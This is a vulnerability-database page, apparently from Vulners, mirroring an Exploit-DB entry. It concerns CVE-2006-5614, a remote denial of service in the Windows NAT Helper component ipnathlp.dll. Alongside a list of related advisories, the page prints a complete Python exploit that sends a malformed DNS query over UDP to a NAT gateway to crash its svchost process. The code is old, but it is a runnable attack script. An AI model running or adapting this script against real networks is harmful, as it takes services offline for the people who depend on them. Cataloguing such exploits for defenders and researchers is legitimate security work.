Lucene search
+L

Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service

🗓️ 28 Oct 2006 00:00:00Reported by h07Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 43 Views

Microsoft Windows NAT Helper Components (ipnathlp.dll) Remote Denial of Servic

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2006-5614
29 May 201815:50
circl
Check Point Advisories
Preemptive Protection against Microsoft Windows 'ipnathlp.dll' Denial of Service Vulnerability
14 Nov 200600:00
checkpoint_advisories
CVE
CVE-2006-5614
31 Oct 200601:00
cve
Cvelist
CVE-2006-5614
31 Oct 200601:00
cvelist
Exploit DB
Microsoft Windows - NAT Helper Components Remote Denial of Service
30 Oct 200600:00
exploitdb
Metasploit
Microsoft Windows NAT Helper Denial of Service
8 Dec 200615:25
metasploit
NVD
CVE-2006-5614
31 Oct 200601:07
nvd
Packet Storm
Microsoft Windows NAT Helper Denial of Service
31 Aug 202400:00
packetstorm
#!/usr/bin/python
# Microsoft Windows NAT Helper Components (ipnathlp.dll) 0day Remote DoS Exploit
# Bug discovered by h07 <[email protected]>
# Tested on XP SP2 Polish
# Details:
#
# Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]
#
# [Process svchost.exe, module ipnathlp]
# --> MOV DL, [EAX]
# Exception C0000005 (ACCESS_VIOLATION reading [00000000])
##

from socket import *
from time import sleep

host = "192.168.0.1"
port = 53

buffer = ( # DNS (query)
"\x6c\xb6" # Transaction ID: 0x6cb6
"\x01\x00" # Flags: 0x0100 (Standard query)
"\x00\x00" # Questions: 0
"\x00\x00" # Answer RRs: 0
"\x00\x00" # Authority RRs: 0
"\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0)
"\x03\x77\x77\x77" #
"\x06\x67\x6f\x6f" #
"\x67\x6c\x65\x03" #
"\x63\x6f\x6d\x00" # Name: www.google.com
"\x00\x01" # Type: A (Host address)
"\x00\x01" # Class: IN (0x0001)
)

s = socket(AF_INET, SOCK_DGRAM)
s.connect((host, port))
s.send(buffer)
sleep(1)
s.close()

# EoF

# milw0rm.com [2006-10-28]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation